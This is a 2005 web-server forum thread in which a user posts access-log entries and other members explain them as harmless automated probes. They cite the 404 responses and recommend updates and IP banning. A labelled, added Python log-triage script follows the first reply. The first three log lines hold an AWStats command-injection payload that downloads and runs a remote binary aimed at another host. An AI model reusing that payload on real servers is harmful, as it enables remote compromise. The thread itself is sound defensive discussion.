Bell-chan
Joined: 09 Nov 2005 Posts: 8
Posted: Wed Nov 09, 2005 1:11 pm Post subject: strange log-entries
Hi!
I've been using the Abyss Web Server X1 for about a month now and since yesterday there are some strange log-entries appearing:
Code:
80.22.51.242 - - [08/Nov/2005:19:53:19 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:20 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:22 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:23 +0100] "POST /xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:24 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:25 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:26 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:28 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:29 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:30 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:31 +0100] "POST /xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:32 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:33 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
What do they mean? To me it looks as if someone is trying to hack my system. If that is the case, do I need to take any precautions?
cu
Bell-chan

Anonymoose
Joined: 09 Sep 2003 Posts: 2192
Posted: Wed Nov 09, 2005 1:31 pm
They are hacking attempts, but not necessarily from individuals - possibly automated sweeps by worms etc.
You have nothing to worry about from those entries - the first is for an AWStats exploit, the second is the newly discovered PHP/XML-RPC exploits. If you look at the response code as shown in your logs (404) it shows that the file was not found, so the request was worthless. If it makes you feel better, you can ban the IPs, but I have a feeling you'll be seeing a lot of the XML-RPC scans soon as the new worm does the rounds :(
Example:
80.22.51.242 - - [08/Nov/2005:19:53:23 +0100] "POST /xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
As always, make sure all your installed server-side software - PHP, bulletin boards etc. - is up to date, and that you have valid backups of forum databases etc. Other than that, sit tight.
_________________
"Invent an idiot proof webserver and they'll invent a better idiot..."
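
Added example, not part of the post above or of the thread: a Python triage of access-log lines in the layout shown in the first post. It URL-decodes each request, names the probe family, and reads the status code the way the reply does (404 means the targeted script is not on this server). The sample lines are constructed (documentation IPs, shortened payload, one hypothetical 200 hit) and the function names are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the thread's log layout (documentation IPs,
# shortened payload); the third line is a hypothetical hit on an existing script.
SAMPLE_LOG = '''\
192.0.2.10 - - [08/Nov/2005:19:53:19 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;echo| HTTP/1.1" 404 234 "" "Mozilla/4.0"
192.0.2.10 - - [08/Nov/2005:19:53:23 +0100] "POST /xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0"
192.0.2.10 - - [08/Nov/2005:19:53:30 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 512 "" "Mozilla/4.0"
198.51.100.7 - - [08/Nov/2005:20:01:02 +0100] "GET /index.html HTTP/1.1" 200 1043 "" "Mozilla/4.0"
'''

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)
SHELL_META = re.compile(r'[|;`]|\$\(')

def classify(method, target):
    """Name the probe family, or return None for ordinary traffic."""
    path, _, query = target.partition('?')
    path = unquote(path).lower()
    query = unquote(query)  # %3b -> ';', %20 -> ' ', and so on
    if path.endswith('/awstats.pl') and SHELL_META.search(query):
        return 'awstats-configdir-cmd'
    if method == 'POST' and path.endswith('/xmlrpc.php'):
        return 'xmlrpc-probe'
    if SHELL_META.search(query):
        return 'shell-metachar-in-query'
    return None

def triage(log_text):
    """Return (ip, probe, status, verdict) for every suspicious line."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        probe = classify(m['method'], m['target'])
        if probe is None:
            continue
        status = int(m['status'])
        # 404: the targeted script is not present, so the request did nothing.
        # Any other status means the path exists and needs a closer look.
        verdict = 'not-present' if status == 404 else 'investigate'
        findings.append((m['ip'], probe, status, verdict))
    return findings

if __name__ == '__main__':
    for row in triage(SAMPLE_LOG):
        print(*row, sep='\t')
```
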

aprelium
Joined: 22 Mar 2002 Posts: 6800
Posted: Thu Nov 10, 2005 10:56 am Post subject: Re: strange log-entries
Bell-chan,
We confirm Anonymoose's answer. These attacks have not affected you.
By the way, if your bandwidth is precious, you can turn on Antihacking in Console > Server Configuration. This will detect such attacks and automatically ban their originating IPs.
_________________
Support Team
Aprelium - http://www.aprelium.com

Bell-chan
Joined: 09 Nov 2005 Posts: 8
Posted: Thu Nov 10, 2005 3:08 pm
Thank you for the quick answers!
As I don't use PHP/Perl/etc. it seems that I don't have to be afraid of anything. ;-) So all I have to do is keep Abyss up to date, which I'm already doing. Also thanks for the advice with the "Anti-Hacking Protection". I've turned it on and am waiting for the next hacking attempt to see what happens.
cu
Bell-chan

kev1952
Joined: 08 Sep 2005 Posts: 105 Location: Townsville Australia
Posted: Mon Nov 28, 2005 11:19 am
Thanks for the information here folks! I have had this "attack" today and did notice that the server withstood it very well. The docs for the "auto anti-hacking", whilst sensible, are a little brief. After reading this thread I've turned it on as an experiment and left the default settings as they are except for the "banning duration" which I've set to 7200 (2hrs). Is this correct or should I approach it in a different way?

Anonymoose
Joined: 09 Sep 2003 Posts: 2192
Posted: Mon Nov 28, 2005 11:57 am
Starting out as you have is sensible. If you notice the same IPs reoffending after the 2 hour ban is up, consider increasing it...
_________________
"Invent an idiot proof webserver and they'll invent a better idiot..."

kev1952
Joined: 08 Sep 2005 Posts: 105 Location: Townsville Australia
Posted: Mon Nov 28, 2005 12:10 pm
Thanks for that - I just wanted to make sure I understood what I was doing. Will keep your advice in mind.